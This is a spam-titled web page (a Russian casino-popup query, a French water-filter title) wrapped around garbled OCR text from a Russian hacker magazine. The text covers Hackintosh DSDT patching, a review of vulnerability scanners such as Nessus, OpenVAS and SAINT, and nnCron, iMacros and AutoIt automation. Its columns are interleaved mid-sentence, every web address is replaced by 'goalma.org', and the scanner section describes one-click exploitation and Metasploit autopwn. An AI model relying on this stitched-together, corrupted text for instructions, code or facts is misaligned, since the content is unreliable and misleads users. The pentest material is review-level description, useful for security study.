в гс браузере постоянно выскакивает вкладка с казино что делать / Consommation/Filtre à eau : Faut-il en user ? | Gabon Culture & Société

В Гс Браузере Постоянно Выскакивает Вкладка С Казино Что Делать

в гс браузере постоянно выскакивает вкладка с казино что делать

xxd -r -p >
Else Да! Наша система идентифицируется ACPI $dmpdir/$tbl_goalma.org
{ как Darwin. $cdir/iasl -d $dmpdir/
If (_OSI ("Windows ")) Вернемся к тому, откуда этот текст, как его $tbl_goalma.org 1>
{ Store (0x04, OSVR) } получить и использовать. Как видишь, это /dev/null 2>&1
Else программа, написанная на языке, сходном с done
{ С. БИОС, при старте компьютера, генерирует echo -e "\nDone!"
If (_OSI ("Windows ")) goalma.org, который исполняется где-то в
{ фоновом режиме вне операционной системы. Вызываем программу Terminal. Создаем
Store (0x05, OSVR) Эту программу можно сохранить в бинар- папку DSDT:
} ном виде в файле в любой ОС, в том числе
Else в Windows. Для этого существует DSDT GUI mkdir DSDT
{ patcher for Windows. Если у тебя уже есть cd DSDT
If (_OSI ("FreeBSD")) MacOSX, можно проделать эту операцию и
{ в нем. Для этого необходимо создать такой Помещаем туда этот скрипт, назовем его
Store (0x06, OSVR) скрипт: goalma.org Помещаем в эту же папку ути-
} литу IASL (версию для Mac находим в интер-
Else #!/bin/bash нете или на диске к журналу). И запускаем
{ скрипт на исполнение:
If (_OSI ("HP-UX")) cdir='dirname $0'
{ dmpdir=acpitbls ./goalma.org
Store (0x07, OSVR) # Create a dump directory
} if [[ ! -d $dmpdir ]];then У нас появляется вложенная папка
Else mkdir $dmpdir acpitbls, внутри которой несколько фай-
{ fi лов — ACPI-таблиц, среди которых и файлы
If (_OSI ("OpenVMS")) goalma.org и goalma.org Последний пред-
{ # Dump ACPI table data from ioreg ставляет собой программу в текстовом виде,

XÀÊÅÐ 01 // 10


управление питанием и частотой процессора <key>IONameMatch</key>
(Intel SpeedStep). В простое процессор рабо-
тает на низкой частоте, при нагрузке — на <array>
максимальной, тем самым гораздо меньше <string>pcib,4e</string>
нагревается. Опять таки, очень актуально для <string>pci14e4,</string>
ноутбуков. <string>pci14e4,</string>
• Шина USB будет работать либо со специ- <string>pci14e4,</string>
альной версией драйвера, либо с DSDT- <string>pci14e4,</string>
патчем на все порты USB. <string>pci14e4,</string>
Ну и, напоследок, приведем список необхо- <string>pci14e4,a</string>
димых драйверов, которые следует поставить <string>pci14e4,</string>
в систему: <string>pci14e4,</string>
КАК ВИДИШЬ, В СИСТЕМЕ ИС- goalma.org — родная версия <string>pci14e4,</string>
ПОЛЬЗУЕТСЯ МЫШЬ ОТ KYE почему-то не соответствует стандартным PC.
SYSTEM, Т.Е. ОБЫЧНАЯ GENIUS. goalma.org — без него систе- Таким образом, драйвер рассчитан на разные
ДЛЯ РАБОТЫ МОЖНО ОБОЙТИСЬ ма не выключается и не перезагружается. варианты адаптеров, но не на А что,
БЕЗ СПЕЦИАЛЬНОЙ ЭППЛОВСКОЙ goalma.org — для включения видеокарт если вручную его туда прописать по образцу?
МЫШКИ (разные вариации, возможна замена на DSDT Да!
patch). И это очень часто работает. В частности, в
goalma.org + рассматриваемом варианте такая подста-
тогда как aml — в бинарном виде. Взаимное goalma.org (rebuilded) или новка приводит к полноценно работающему
превращение одного в другое осуществляет- goalma.org — если у тебя клавиатура, драйверу.
ся компилятором iasl. мышь или трекпад подключены как PS2.
goalma.org — для ÎÁÍÎÂËÅÍÈÅ ÑÈÑÒÅÌÛ
iasl -ta goalma.org показа батарейки на ноутбуках. Выполняя обновление системы, непо-
iasl -d goalma.org goalma.org — сообщает системе необ- средственно через Software Update
ходимую приватную информацию. goalma.org или просто загрузив Combo Update с
Файл dsl можно редактировать обычным можно удалить. официального сайта Apple, важно пом-
текстовым редактором (но не виндусовыми goalma.org — драйвер, подходящий нить, что именно ты менял в системе,
Notepad, Wordpad, они создают другой конец для большинства звуковых карт стандарта чтобы после апдейта «привести ее в
строки, и текст будет капитально испорчен!), High Definition Audio. При этом goalma.org чувство». В частности, в вышеприведен-
чтобы исправить алгоритм программы. обязательно следует удалить. ном примере с WiFi после апдейта цифру
Исправленный файл откомпилировать (iasl Установка любого драйвера осуществляется придется вводить заново. Если ты
-ta goalma.org), и отправить в корень диска: из терминала командой используешь VoodooHDA, предваритель-
sudo cp -r -v /tmp/goalma.org но удалив AppleHDA, то после апдейта
sudo cp -v goalma.org / /System/Library/Extensions/ он появится вновь, и конфликт приведет
Внимание! Копирование кекста с помощью к краху системы. Чтобы этого избежать,
После перезагрузки системы изменения всту- мыши не приводит к его корректной инстал- перед обновлением следует переместить
пят в силу. ляции, такой файл будет иметь неправильные VoodooHDA в безопасное место, а после
Файл DSDT всегда индивидуален, чужой права и не примется системой. успешного обновления вновь его устано-
взять нельзя. Тот, что создан БИОСом, не вить. Аналогичные рекомендации будут
рассчитан на работу с ХакОС, и даже не ÈÄÅÍÒÈÔÈÊÀÖÈß ÓÑÒÐÎÉÑÒÂ и относительно других родных кекстов,
только в смысле идентификации системы, но Каждое PCI-устройство имеет иденти- которые ты по той или иной причине
и потому, что для MacOSX требуется больше фикаторы DeviceID и VendorID, каждое удалил. Существует вариант Disabler.
информации об устройствах и иное распре- USB-устройство — idProduct и idVendor, kext, который позволяет не удалять род-
деление прерываний. Все вместе — большая каждое ACPI-устройство — имя типа ные кексты, а просто отменить их загруз-
и достаточно сложная тема, в интернете PNPxxxx или ACPIxxxx. Во многих случа- ку, в этом варианте обновлению вообще
выложены многостраничные инструкции в ях патч родных драйверов заключается ничего не мешает.
каких случаях и что нужно менять в этом в подмене идентификаторов родных на
файле. Краткий перечень: свои. К примеру, установлен WiFi Adapter ÏÅÐÅÕÎÄ ÍÀ ÍÀÑÒÎßÙÈÉ MAC
• Отменить прерывания таймеров HPET, RTC, Broadcom Открываем в виндоусе Устанавливая таким образом MacOS X, теря-
TMR и добавить IRQ2 для IPIC. Много про- «Диспетчер Устройств», находим его и ешь одну из главных фишек системы —
блем решается именно здесь. смотрим сведения, совместимые коды обо- чрезвычайную продуманность, всецело
• Инициализировать IDE timing registers. рудования. Узнаем, что DeviceID= и избавляющую пользователя от головной
Теперь можно использовать родной VendorID=14e4. боли по поводу чего-либо. Однако гиков
goalma.org Затем смотрим в системную папку и находим такими проблемами не испугать. В прин-
• Прописать свойства звуковой карточки, похожий драйвер для Broadcom , изуча- ципе, с тем же успехом можно было взять
сетевой и видео, чтобы заработали драйвера ем его goalma.org: готовую сборку ХакОС и получить систему за
для них. 15 минут. Поэтому наша цель была глубже, и
• Прописать устройства, которые не были sudo nano /System/Library/ теперь мы не только знаем, каким образом
предусмотрены в БИОС. Extensions/IOFamily. устанавливается MacOSX на обычный ком-
• Скорректировать события засыпания/про- kext/Contents/PlugIns/ пьютер, но и каким образом может на нем
буждения — тема актуальна для владельцаев AppleAirPortBrcmkext/ работать. Впрочем, привыкнув к системе,
ноутбуков. Contents/goalma.org очень скоро понимаешь, что надо покупать
• Описать методы и свойства процессора. оригинальный Mac и не идти ни на какие
Таким способом удается заставить работать И вот что в нем: компромиссы :). z

XÀÊÅÐ 01 // 10


PC_ZONE
СТЕПАН «STEP» ИЛЬИН goalma.org

9 ÑÊÀÍÅÐÎÂ
ÁÅÇÎÏÀÑÍÎÑÒÈ
ÏÎÄÁÎÐÊÀ ÈÍÑÒÐÓÌÅÍÒÎÂ ÄËß ÏÅÍÒÅÑÒÅÐÀ
У каждого из команды z — свои предпочтения по части софта и утилит для пентеста. Посовещавшись,
выяснили: выбор так разнится, что можно составить настоящий джентльменский набор из проверенных
программ. На том и решили. Чтобы не делать сборную солянку, весь список мы разбили на темы. Сегодня
мы коснемся святая святых любого пентестера — сканера уязвимостей.

Nessus
goalma.org
goalma.org
Free/Shareware
Win/nix/Mac
Если кто-то и не пробовал Nessus, то, по
меньшей мере, слышал о нем. Один из самых
известных сканеров безопасности имеет КЛИЕНТСКАЯ ЧАСТЬ NESSUS НА
богатую историю: будучи когда-то открытым FLEX’Е
НАСТРОЙКИ СКАНИРОВАНИЯ
проектом, программа перестала распростра-
OPENVAS
няться в открытых исходниках. К счастью, через удобный интерфейс на Flash’е, имея
осталась бесплатная версия, которая изна- один лишь браузер. После установки скане- Отличительная черта Nessus — умные
чально была сильно обделена в доступе к ра серверная запускается автоматически, плагины. Сканер никогда не будет скани-
обновлениям для базы уязвимостей и новым как только укажешь ключ для активации: ровать сервис только по номеру его порта.
плагинам, но позже разработчики сжалились ты бесплатно можешь запросить его на Переместив веб-сервер со стандартного
и лишь ограничили ее в периодичности домашнем сайте Nessus. Правда, для входа, го порта, скажем, на й, обмануть
апдейтов. Плагины — ключевая особенность и локального, и удаленного, понадобится Nessus не удастся — он это определит.
архитектуры приложения: любой тест на про- предварительно создать пользователя: в Если на FTP-сервере отключен анонимный
никновение не зашивается наглухо внутрь винде это делается в два клика мыши через пользователь, а часть плагинов использу-
программы, а оформляется в виде подклю- GUI-админку Nesus Server Manager, с ее же ют его для проверки, то сканер не будет их
чаемого плагина. Аддоны распределяются на помощью можно запускать и останавливать запускать, заведомо зная, что толку от них не
42 различных типа: чтобы провести пентест, сервер. будет. Если плагин эксплуатирует уязвимость
можно активировать как отдельные плагины, Любой тест на проникновение начинается с в Postfix’е, Nessus не будет пытать счастья,
так и все плагины определенного типа — создания так называемых Policies — правил, пробуя тесты против sendmail’а — и т.д.
например, для выполнения всех локальных которых сканер будет придерживаться во Понятно, что для выполнения проверок на
проверок на Ubuntu-системе. Причем никто время сканирования. Здесь-то и выбираются локальной системе, необходимо предоста-
не ограничивает тебя в написании собствен- виды сканирования портов (TCP Scan, UDP вить сканеру Credentials (логины и пароли
ных тестов на проникновения: для этого в Scan, Syn Scan и т.д.), количество одно- для доступа) — это завершающая часть
Nessus был реализован специальный скрип- временных подключений, а также типичные настройки правил.
товый язык — NASL (Nessus Attack Scripting чисто для Nessus опции, как, например,
Language), который позже позаимствовали и Safe Checks. Последняя включает безопас- OpenVAS
другие утилиты. ное сканирование, деактивируя плагины, goalma.org
Еще большей гибкости разработчики доби- которые могут нанести вред сканируемой Freeware
лись, отделив серверную часть сканера, системе. Важный шаг в создании правил — Win/nix/Mac
выполняющего все действия, от клиентской это подключение нужных плагинов: можно Несмотря на то, что исходные коды Nessus
программы, представляющей собой не более активизировать целые группы, скажем, стали закрытыми, движок Nessus 2 и часть
чем графический интерфейс. В последней Default Unix Accounts, DNS, CISCO, Slackware плагинов по-прежнему распространяются
версии демон на порту открывает Local Security Checks, Windows и т.д. Выбор по лицензии GPL в виде проекта OpenVAS
веб-сервер; с ним можно управлять сканером возможных атак и проверок — огромный! (OpenSource Vulnerability Assessment

XÀÊÅÐ 01 // 10


fingerprinting, ovaldi для поддержки OVAL —
стандартного языка для описания уязвимо-
стей — и множество других.

XSpider 7
goalma.org
goalma.org
Shareware
Win
Первые строчки кода XSpider были напи- РАЗНЫЕ ВИДЫ СКАНИРОВАНИЯ
ОТЧЕТ О СКАНИРОВАНИИ ХОСТА В саны 2 декабря года, а за прошедшие GFI LANGUARD
XSPIDER с тех пор 12 лет этот сканер стал известен
каждому российскому специалисту по инфор-
Scanner). Сейчас проект развивается совер- мационной безопасности. Вообще, Positive GFI LANguard
шенно независимо от своего старшего Technologies — одна из немногих компаний goalma.org
брата и делает немалые успехи: последняя на отечественном рынке информацион- Freeware/Shareware
стабильная версия вышла как раз перед ной безопасности, чьи сотрудники умеют Win
отправкой номера в печать. Неудивительно, реально что-то ломать, а не только красиво Я особенно люблю этот продукт — за набор
что OpenVAS так же использует клиент- продавать услуги. Продукт был написан не предустановленных профилей для сканирова-
серверную архитектуру, где все операции программистами, а специалистами по ИБ, ния. Помимо полного сканирования удален-
сканирования выполняются серверной знающими, как и что надо проверять. Что в ной системы, подразумевающего все виды
частью — она работает только под никсами. итоге? Имеем очень качественный продукт с доступных проверок (кстати, есть специальная
Для запуска потребуется закачать пакеты одним лишь, но весьма серьезным для нас версия для медленного коннекта — напри-
openvas-scanner, а также набор библиотек минусом: XSpider платный! Задаром разра- мер, для тормозного VPN-соединения через
openvas-libraries. В качестве клиентской ботчики предлагают урезанную демо-версию, Штаты), есть масса отдельных групп проверок.
части для OpenVAS доступна только в которой не реализован целый ряд проверок, Например, можно быстро проверить десят-
никсовая GUI-программа, но, думаю, что, в том числе эвристических, а также онлайн- ки хостов на наличие уязвимостей из Top20,
как у предыдущих версий, скоро появится обновления для базы уязвимостей. Более составленной известной security-корпорацией
порт для винды. В любом случае, проще того, силы разработчиков сейчас всецело SANS. Тут же можно активировать и поиск
всего воспользоваться OpenVAS при помо- направлены на другой продукт — систему машин с неустановленными патчами или
щи небезызвестного LiveCD Bactrack (4-ая мониторинга информационной безопасно- сервис-паками, выбрать профиль для пентеста
версия), в котором он уже установлен. Все сти MaxPatrol, для которой, увы, нет даже и веб-приложений и т.д. Причем, кроме профи-
основные операции для начала работы демки. лей, непосредственно направленных на поиск
вынесены в пункты меню: OpenVAS Make Но даже при всех ограничениях XSpider уязвимостей, есть и ряд средств для аудита:
Cert (создание SSL-сертификата для доступа является одним из самых удобных и эффек- поиск шар, умный сканер портов, в том числе
к серверу), Add User (создание юзера для тивных инструментов анализа безопасности для поиска открытых малварью соединений,
доступа к серверу), NVT Sync (обновление сети и конкретных узлов. Настройки скани- определение конфигурации компьютера и т.д.
плагинов и баз уязвимостей), и, в конце кон- рования, как и в случае Nessus, оформля- Получается, в одном продукте уживаются масса
цов, OpenVAS Server (запуск сервера через ются в виде специального набора правил, полезных утилит. Постоянно обновляемая база
пункт меню). Далее остается только запу- только в данном случае они называются не уязвимостей GFI LANguard включает более
стить клиентскую часть и выполнить под- Policies, а профилями. Настраиваются как записей, позволяя сканировать самые
ключение к серверу для начала пентеста. общие параметры для сетевого анализа, разные системы (Windows, Mac OS, Linux), в
Открытость и расширяемость OpenVAS позво- так и поведение сканера для конкретных том числе, установленные на виртуальных
лила сильно прокачать программу. Помимо протоколов: SSH, LDAP, HTTP. Тип исследуе- машинах. Сканер автоматически подтягивает
непосредственно плагинов для анализа мого демона на каждом порту определяется обновления для базы, которые в свою очередь
защищенности, в нее интегрировано немало не по общепринятой классификации, а с формируются по отчетам BugTraq, SANS и дру-
известных утилит: Nikto для поиска уязвимых использованием эвристических алгорит- гих компаний. Реализовать свои собственные
CGI-сценариев, nmap для сканирования пор- мов fingerprinting’а — опция включается проверки, как водится, можешь и ты сам. Для
тов и моря других вещей, ike-scan для обна- одним кликом в профиле сканирования. этого предоставляется специальный скрип-
ружения IPSEC VPN узлов, amap для иден- Отдельного слова заслуживает обработка товый язык, совместимый с Python и VBScript
тификации сервисов на портах, используя RPC-сервисов (Windows и *nix) с полной (какова связка!), а для полного удобства еще и
идентификацией, благодаря которой удается удобный редактор с дебагером — получается
СКАНЕР ОТ ИЗВЕСТНОЙ SECURITY- определить уязвимости различных сервисов настоящая IDE. Еще одна уникальная фишка
КОМПАНИИ EEYE и детальную конфигурацию компьютера в LANguard’а — возможность определения того,
целом. Проверка слабости парольной защи- что машина запущена в виртуальном окруже-
ты реализует оптимизированный подбор нии (пока поддерживается VMware и Virtual
паролей практически во всех сервисах, тре- PC) — это одна из уникальных фишек сканера.
бующих аутентификации, помогая выявить
слабые пароли. Результат сканирования Retina Network Security
оформляется в виде удобного отчета, при- Scanner
чем для каждой найденной потенциальной goalma.org
уязвимости выдается крохотное описание Shareware
и внешний линк, куда можно обратиться за Win
подробностями. Главное разочарование этого легендарного

XÀÊÅÐ 01 // 10


PC_ZONE

ОТЧЕТ MBSA, ПЕРЕНЕСЕННЫЙ НА СХЕМУ VISIO

сканера постигло меня сразу после запуска. Установщик сти ОС, приложений, потенциально опасные настройки и
последней версии, выругавшись, сказал, что запустить параметры. В результате можно получить обзорный план
Retina на Windows 7 или Windows Server R2 на сети с отображением потенциально уязвимых мест. База
WARNING текущий момент нельзя. Не очень-то вежливо, при- с уязвимостями, по заверениям разработчиков, обновля-
шлось открывать виртуальную машину, но я-то знал: ется ежечасно, а информация об уязвимости попадает в
оно того стоит. Retina — один из лучших сканеров, кото- базу не позднее 48 часов после появления о ней первого
рый определяет и анализирует хосты локальной сети. бактрака. Впрочем, сам факт, что это продукт фабрики
warning Физические и виртуальные серверы, рабочие станции eEye, уже является своего рода гарантией качества.
Пентест серверов и ноутбуки, маршрутизаторы и аппаратные брандмауэ-
и ресурсов без воли их ры — Retina представит полный список подключенных Microsoft Baseline Security
владельцев — к сети устройств, выведет информацию о беспроводных Analyzer
деяние уголовно сетях. Каждый из них она всячески будет пытать в поиске goalma.org
наказуемое. В случае хоть какого-то намека на уязвимость, и делает это очень Freeeware
использования по- шустро. На сканирование локальной сети класса С уходит Win
лученных знаний примерно 15 минут. Продукт Retina определяет уязвимо- Что это такое? Анализатор безопасности от компании
в незаконных целях Microsoft, который проверяет компьютеры в сети на
автор и редакция соответствие требованиям Microsoft, которых набралось
ВЕБ-МОРДА СКАНЕРА SAINT
ответственности не немалое количество. Самый главный критерий — это,
несут. конечно же, наличие на системе всех установленных
обновлений. Не надо напоминать, что сделал Conficker,
используя брешь MS, патч для которой вышел за 2
месяца до эпидемии. Помимо отсутствующих в системе
DVD патчей, MBSA обнаруживает и некоторые распростра-
ненные бреши в конфигурации. Перед началом скани-
рования программа скачивает обновления для своих
dvd баз, поэтому можно быть уверенным: Microsoft Baseline
Большую часть пред- Security Analyzer знает все о вышедших апдейтах для
ставленных в обзоре винды. По результатам сканирования (домена или диа-
утилит ты найдешь на пазона IP-адресов) выдается сводный отчет. И без того
нашем DVD-диске. наглядный репорт можно перенести на условную схему
сети, отобразив результаты сканирования в Visio. Для
этого на сайте программы доступен специальный соеди-
нитель, который отобразит символами различные узлы
локалки, заполнит параметры объектов, добавив туда
информацию о сканировании, и в удобнейшей форме

XÀÊÅÐ 01 // 10


позволит посмотреть, какие проблемы есть на
том или ином компе.

SAINT
goalma.org
Shareware
nix
Всего лишь два IP-адреса, на которые ты
сможешь натравить SAINT в течение триаль-
ного периода, жестко зашиваются в ключ,
и он отправляется тебе на е-мейл. Ни шагу
влево, ни шагу вправо — но этот продукт обя-
зательно стоит попробовать, даже с такими
драконовскими ограничениями. Управление
сканером реализуется через веб-интерфейс,
что неудивительно — решения SAINT про- X-SCAN УМЕЕТ ПОДКЛЮЧАТЬ ПЛАГИНЫ NESSUS
даются, в том числе, в виде серверов для
установки в стойку (SAINTbox), а тут нужно Последняя версия этого сканера вышла еще рела проект Metasploit Framework, и
следовать моде. С помощью аскетичного веб- в году, что вовсе не мешает использо- именно ее рук дело — проект NeXpose.
интерфейса очень просто можно запустить вать его сейчас благодаря системе подклю- Стоимость «входа» для использования
тестирование и использовать многолетние чаемых плагинов и скриптов, написанных на коммерческой версии составляет без
наработки для поиска потенциально уязви- языке NASL, таком же, который используется малого $, но для энтузиастов есть
мых мест в системе. Скажу больше: один из в Nessus/OpenVAS. Найти и отредактиро- Community-версия с чуть-чуть урезан-
модулей SAINTexploit позволяет не только вать имеющиеся скрипты несложно — все ными возможностями. Такая бесплат-
обнаружить, но еще и эксплуатировать уязви- они находятся в папке scripts. Для запуска ная версия легко управляется через
мость! Возьмем пресловутую ошибку MS сканера необходимо обозначить параметры веб-интерфейс, а также интегрируется
Если сканер обнаруживает неприкрытую сканирования через меню Config Æ Scan с Metasploit’ом (нужна версия не ниже
дырку и знает, как ее эксплуатировать, то Parameter. В качестве объекта сканирования ). Схема работы достаточно хитрая:
прямо рядом с описанием уязвимости дает может выступать как конкретный IP, так и сначала запускается NeXpose, далее
ссылку с близким сердцу словом EXPLOIT. В диапазон адресов, но в последнем случае Metasploit Console (msfconsole), после
один клик ты получаешь описание сплоита надо быть морально готовым к тому, что чего можно запускать процесс сканиро-
и, более того, — кнопку Run Now для его тестирование будет длительным. Сканер, вания и настраивать его с помощью ряда
запуска. Далее, в зависимости от сплоита, увы, не самый быстрый. На скорость про- команд (nexpose_connect, nexpose_scan,
указываются различные параметры, напри- порционально влияет и количество подклю- nexpose_discover, nexpose_dos и дру-
мер, точная версия ОС на удаленном хосте, ченных модулей: дополнения, проверяющие гие). Прикольно, что можно совмещать
тип шелла и порт, на котором он будет запу- стойкость паролей для SSH/VNC/FTP, одни из функциональность NeXpose и других
щен. Если эксплуатирование цели удачно самых прожорливых. Внешне X-Scan больше модулей Metasploit’а. Самый простой, но
завершено, то во вкладке Connections модуля напоминает самоделку, созданную кем-то действенный пример: искать компьютеры
SAINTexploit появляется IP-адрес жертвы и для собственных нужд и пущенную в паблик с некой уязвимостью и тут же эксплуати-
выбор действий, которые стали доступными на свободное плавание. Возможно, он бы ровать ее с помощью соответствующего
в результате запуска эксплоита: работа с и не получил такой популярности, если не модуля Metasploit — получаем авторутинг
файлами на удаленной системе, командная поддержка скриптов Nessus, которые акти- на новом качественном уровне. z
строка и т.д! Представляешь: сканер, кото- вируются с помощью модуля Nessus-Attack-
рый сам ломает! Недаром слоган продукта: Scripts. С другой стороны, стоит посмотреть
«Examine. Expose. Exploit». Система проверок отчет о сканировании, и все сомнения в
самая разнообразная, причем в последней полезности сканера отходят на второй план. ИНТЕГРИРУЕМ NEXPOSE
7-й версии появился модуль для пентеста Он не будет оформлен по одному из офици- В METASPLOIT
веб-приложений и дополнительные возмож- альных стандартов ИБ, но точно расскажет
ности для анализа баз данных. Обозначив много нового о сети.
цель через веб-интерфейс, можно наблюдать
за действиями сканера со всеми подробно- Rapid 7 NeXpose
стями, точно зная, что и как сканер делает в goalma.org
текущий момент. Freeeware-версия
nix/Win
X-Scan Rapid 7 — одна из самых быстро расту-
goalma.org щих компаний, специализирующихся
Freeware на информационной безопасности,
Win в мире. Именно она недавно приоб-

XÀÊÅÐ 01 // 10


PC_ZONE
СТЕПАН «STEP» ИЛЬИН goalma.org

ÑÅÊÐÅÒÛ
ÀÂÒÎÌÀÒÈÇÀÖÈÈ
ÍÅÑÊÎËÜÊÎ ÏÐÈÌÅÐΠÒÎÃÎ, ÊÀÊ ÎÁËÅÃ×ÈÒÜ
ÑÅÁÅ ÆÈÇÍÜ
ÏÎÏÐÎÁÓÉ ÏÎÑ×ÈÒÀÒÜ, ÑÊÎËÜÊÎ ÂÐÅÌÅÍÈ Ó ÒÅÁß ÓÕÎÄÈÒ ÂÏÓÑÒÓÞ ÍÀ ÂÛÏÎËÍÅÍÈÅ ÎÄ-
ÍÈÕ È ÒÅÕ ÆÅ ÄÅÉÑÒÂÈÉ. ÍÅÏÐÎÑÒÀß ÇÀÄÀ×À? ÇÀÒÎ ÀÂÒÎÌÀÒÈÇÈÐÎÂÀÒÜ ×ÀÑÒÜ ÐÓÒÈÍÍÎÉ
ÐÀÁÎÒÛ ÌÎÆÍÎ ÇÀÏÐÎÑÒÎ. È ÁÜÞÑÜ ÎÁ ÇÀÊËÀÄ, ÒÀÊÀß ÐÓÒÈÍÀ ÅÑÒÜ Ó ÊÀÆÄÎÃÎ.

×
тобы не быть голословными, разберем появилась такая возможность в виде опции стим (но обязательно положим на диск PDF
несколько конкретных задач, отыскав TCP Rate Control, позволяющей подстраивать статьи «Пусть он все делает сам!» со всеми
для их решения подходящие утилит ы. скорость TCP-соединений клиента так, чтобы подробностями) и сразу приступим к делу.
К счастью, под виндой с помощью всего его работа не мешала другим приложениям. Главный наш помощник — функция WatchProc,
двух-трех утилит можно автомати- Мало этого, когда-то давно я устанавливал которая отслеживает состояние процесса
зировать абсолютно все и легко эмулировать специальный cFos-драйвер, с помощью кото- в памяти. Как только в памяти появится
действия пользователя. Итак, первая задачка. рого можно было задать низкий приоритет для goalma.org (наш скринсейвер), с помощью
торрента, а высокий — для браузера. Однако START-APP мы запустим приложение:
ÇÀÄÀ×À: ценность нашего примера именно в том, чтобы
Отслеживать активность работы пользователя обработать событие, когда компьютер находит- #( Torrent_start
и в периоды простоя выполнять ресурсоемкие ся в idle-режиме (т.е. ничего не делает), и от AsLoggedUser
задачи. этого уже плясать. LoadProfile
Проще всего отслеживать появление в памяти User: «username» SecPassword:
ÐÅØÅÍÈÅ: процесса скринсейвера и в этот момент запу- «passhash» Domain: «DOMAIN»
Нет ничего лучше, чем загрузить компьютер скать utorrent и, наоборот, когда его процесс LogonInteractive
выполнением какой-то ресурсоемкой опе- выгружается из памяти, закрывать utorrent. В WatchProc: «goalma.org»
рации в тот момент, когда это нас никак не нашем давнишнем материале про автомати- Rule: PROC-EXIST: «goalma.org»
побеспокоит, а именно, когда за компьютером зацию мы уже рассказывали тебе о замеча- NOT
никого нет. Такая возможность, кстати, есть у тельной программе nnCron (goalma.org). Action:
некоторых прогрессивных продуктов: тот же Этот уникальный планировщик задач не только StartIn: «C:\Program Files\
Norton Antivirus имеет функцию Idle Scan и умеет запускать процессы по расписанию, но uTorrent»
очень четко выполняет полное или частичное и способен отслеживать файлы, флаги, окна, ShowNormal NormalPriority
сканирование системы в момент отсутствия процессы, движения мыши, время простоя START-APP: C:\Program Files\
пользователя. Или вот другой полезный компьютера, клавиатурные шорткаты, выход в uTorrent\goalma.org
пример — чтобы торрент-клиент не мешал онлайн/оффлайн, появление диска в драйве, )#
серфингу, предоставлять ему максимальную наличие хоста в сети (пинг), изменение уда-
ширину канала, когда за компьютером никто ленного ресурса по http-протоколу, количество И напротив, когда процесс выгрузится из
не работает. Попробуем реализовать это на свободного места на диске, загруженность памяти, то закрываем и окно utorrent'а:
примере uTorrent (goalma.org). Тут надо оперативной памяти и многое другое. Вводную
сказать, что в самом клиенте не так давно часть по использованию программы мы опу- #( Torrent_stop

XÀÊÅÐ 01 // 10


СКРИПТ ДЛЯ УПРАВЛЕНИЯ
UTORRENT

вводом некоторых нужных параметров (ска-


жем, для локального поиска на сайте). К тому
же, далеко не любую страницу можно добавить
в закладки из-за особенностей сайта. В итоге,
ПАРАМЕТРЫ NNCRON мы раз за разом выполняем одни и те же
действия, чтобы добраться до нужной части
сайта или одним и тем же способом восполь-
зоваться онлайн-сервисом. Приведу пример
AsLoggedUser из жизни. Мне достаточно часто приходится
WatchProcStop: «goalma.org» ездить на поездах в двух-трех направлениях,
Action: и, чтобы сэкономить время, я покупаю билеты
WIN-TERMINATE: "*Torrent*" онлайн на сайте goalma.org (тут хочется прокричать
)# трижды «Ура» по поводу того, что у нас вообще
есть такая возможность). Но чтобы перейти
Надо учитывать, что некоторые программы к покупке билета, необходимо сначала зайти
блокируют запуск скринсейвера (например, на недавно обновленный сайт РЖД, выбрать
медиа-проигрыватели), поэтому для чистоты пункт «Купить билет», после чего попасть на
эксперимента необходимо мониторить и эти старый сайт компании, откуда в свою очередь
процессы. В качестве альтернативы можно нажать на «Вход для зарегистрированных
отслеживать именно простой компьютера: пользователей», ввести на отдельной страни-
в nnCron для этого есть событие IDLE. При це логин и пароль (сессия не сохраняется в
этом процесс uTorrent'а можно не закрывать, целях безопасности). После авторизации опять
а изменять для него параметры максимально подтвердить, что хочешь купить билет, выбрав
полосы пропускания. Для последнего пона- в меню пункт «Покупка билета», проскроллить
добится включить в настройках клиента веб- страницу с регламентом работы онлайн-
интерфейс и, поэкспериментировав с нужными сервиса, подтвердить согласие установкой
параметрами, понять, как составить нужный галочки — и только затем попасть на страницу
HTTP-запрос для управления скоростью для ввода станции отправления и назначе-
загрузки. ния, количества пассажиров и даты поездки.
Причем все, кроме даты, у меня, как правило,
ÇÀÄÀ×À: неизменно, поэтому и эти данные я ввожу на
Автоматизировать любые действия в брау- автомате. Клик-клик-клик — каждый раз одно
зере, которые обычно приходится выполнять и то же. Ждать, пока РЖД наймет специали-
вручную. стов по юзебилити, можно до пенсии, поэтому
все описанные действия я поручил специ- ПАНЕЛЬ IMACROS
ÐÅØÅÍÈÅ: альному плагину для Firefox/IE — iMacros
У каждого есть набор онлайн-сервисов или (goalma.org).
просто информационных ресурсов, кото- Как заставить выполнять его нужные дей- редактирование макросов. Все, что потребо-
рые он посещает. Создание закладок или ствия? Просто показать, что нужно делать. В валось для решения моей задачи, перейти на
объединение их в группы для одновременного браузере после установки появится специ- вкладку «Запись», выбрать пункт «Записать»,
открытия — самый простой способ облегчить альная панель со списком существующих проделать все действия, которые я ранее опи-
себе жизнь. Увы, он не решает проблемы с сценариев, а также тремя вкладками, с сал, нажать на «Стоп» и далее добавить свой
необходимостью ручной авторизации, а также помощью которых осуществляется создание и макрос в систему кнопкой «Сохранение». При

XÀÊÅÐ 01 // 10


PC_ZONE

полезных для выполнения часто повторяю-


щихся задач, таких как инсталляция идентич-
ных наборов программ на большое количество
компьютеров. Позже AutoIt серьезно преоб-
разилась, предоставив возможность создавать
полноценные GUI-интерфейсы, а сами скрип-
ты компилировать в исполняемые EXE-файлы,
которые запускаются на любой системе, даже
РЕДАКТОР ДЛЯ РЕДАКТИРОВА- без установленной AutoIt. Для эмуляции рабо-
НИЯ МАКРОСОВ ты пользователя особенно важен перехват
ДОБАВЛЯЕМ НОВОГО ПОЛЬЗО- и эмуляция клавиатурных нажатий и кликов
ВАТЕЛЯ С ПОМОЩЬЮ СКРИПТА мышки. При этом скрипты обладают всей той
этом сам плагин записывает каждое действие AUTOIT мощью, которая нужна для автоматизации.
на своем псевдоязыке: Макросы могут работать с протоколами UDP
и TCP, изменять значения реестра, работать
VERSION BUILD= RECORDER=FX «SwitchProxy» и без проблем вызывал его из с файлами и буфером обмена, а также запу-
TAB T=1 кода на Python: скать консольные приложения, имея доступ
URL GOTO=goalma.org к стандартным потокам ввода/вывода. Есть
TAG POS=1 TYPE=A import goalma.org и функциональность, частично дублирующая
ATTR=TXT:Êóïèòü<SP>áèëåò def Hello(): iMacros, позволяя автоматизировать работу в
TAG POS=1 TYPE=A ATTR=TXT:Âõîä<SP> import goalma.org браузерах (IE, Opera, Firefox). Более того, как
äëÿ<SP>çàðåãèñòðèðîâàííûõ<SP>ïîëüçî w=goalma.org из обычных языков программирования, можно
